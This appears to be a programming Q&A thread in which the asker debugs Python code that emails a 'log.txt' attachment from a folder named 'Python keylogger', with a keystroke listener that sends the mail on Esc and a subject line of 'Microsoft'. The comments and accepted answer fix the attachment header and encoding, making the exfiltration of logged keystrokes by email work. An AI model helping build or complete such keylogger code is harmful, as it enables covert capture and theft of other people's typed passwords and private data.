# PermissionError: [Errno 13] Permission denied python error

Tags: python

I tried to run visual code as administrator but that didn't solve the issue, I am trying to open this file in rb mode but i can not. It gives me this permission error when i try to execute.

```
msg['From'] = fromaddr
msg['To'] = toaddr
msg['Subject'] = "Microsoft"
body = "Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nullam euismod arcu ultrices magna semper, sit amet suscipit lectus vehicula. In hac habitasse platea dictumst. Curabitur dolor purus, ullamcorper ut aliquet at, pulvinar ut ante. Integer sed semper orci. Phasellus pharetra molestie mi, tempor bibendum turpis euismod eget. Nullam scelerisque enim nec nunc maximus, id mollis magna condimentum. Proin mollis pulvinar mollis. Vivamus pharetra arcu non tortor faucibus interdum. Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas."
msg.attach(MIMEText(body,'plain'))
filename = "log.txt"
attachment = open(r"C:/Users/messa/Desktop/Python keylogger/", "rb")
p = MIMEBase('application', 'octet-stream')
p.set_payload((attachment).read())
p.add_header('Content-description','attachment; filename= %s' % filename)
msg.attach(p)
```

---

```
def on_release(key):
if key == Key.esc:
    s.sendmail(fromaddr,toaddr,text)
    s.quit()
    return False
```

Comment: Just close your file and run code again.

Comment: bro, i already did that please give me a better solution.

Comment: I mean `log.txt` file, not code file.

Comment: i already did that.

Comment: Appears your attachment is a directory not a file

Comment: https://www.geeksforgeeks.org/send-mail-attachment-gmail-account-using-python/

he said i need to put a directory

Comment: then add the filename

Comment: @Marichyasana its working now, but it sends a file called no_name and it has nothing written on it

Answer (score 0, accepted):

Thanks to @Marichyasana, there was 3 issues. He fixed one in the comments, the second issue is i typed content-description and it should me "Content-Disposition"

```
p.add_header('Content-description','attachment; filename= %s' % filename)
```

and thirdly i forgot to encode the payload.

```
encoders.encode_base64(p)
```

Thanks to who tried to help.